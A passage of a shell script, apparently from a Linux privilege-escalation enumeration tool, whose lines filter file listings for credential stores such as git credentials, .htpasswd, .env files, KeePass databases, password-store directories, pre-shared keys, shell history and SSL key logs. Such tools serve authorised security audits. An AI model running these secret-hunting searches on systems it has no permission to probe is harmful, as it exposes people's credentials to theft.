    883   PSTORAGE_BOTO=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.boto$" | sort | uniq | head -n 70)
    884   PSTORAGE_SNMP=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70)
    885   PSTORAGE_PYPIRC=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.pypirc$" | sort | uniq | head -n 70)
    886   PSTORAGE_POSTFIX=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "aliases$|postfix$" | sort | uniq | head -n 70)
    887   PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.cloudflared$" | sort | uniq | head -n 70)
    888   PSTORAGE_HISTORY=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*_history.*$" | sort | uniq | head -n 70)
    889   PSTORAGE_HTTP_CONF=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "httpd\.conf$" | sort | uniq | head -n 70)
    890   PSTORAGE_HTPASSWD=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.htpasswd$" | sort | uniq | head -n 70)
    891   PSTORAGE_LDAPRC=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.ldaprc$" | sort | uniq | head -n 70)
    892   PSTORAGE_ENV=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -v -E 'example' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.env.*$" | sort | uniq | head -n 70)
    893   PSTORAGE_PROXY_CONFIG=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E '^/etc/environment$' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "environment$|apt\.conf$|apt\.conf\.d$" | sort | uniq | head -n 70)
    894   PSTORAGE_SNIFFING_ARTIFACTS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.pcap$|.*\.pcapng$|keys\.log$|sslkeylog\.log$" | sort | uniq | head -n 70)
    895   PSTORAGE_MSMTPRC=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.msmtprc$" | sort | uniq | head -n 70)
    896   PSTORAGE_INFLUXDB=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70)
    897   PSTORAGE_ZABBIX=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70)
    898   PSTORAGE_GITHUB=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70)
    899   PSTORAGE_SVN=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.svn$" | sort | uniq | head -n 70)
    900   PSTORAGE_KEEPASS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70)
    901   PSTORAGE_PRE_SHARED_KEYS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.psk$" | sort | uniq | head -n 70)
    902   PSTORAGE_PASS_STORE_DIRECTORIES=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.password-store$" | sort | uniq | head -n 70)
    903   PSTORAGE_FTP=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"  | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "vsftpd\.conf$|.*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70)
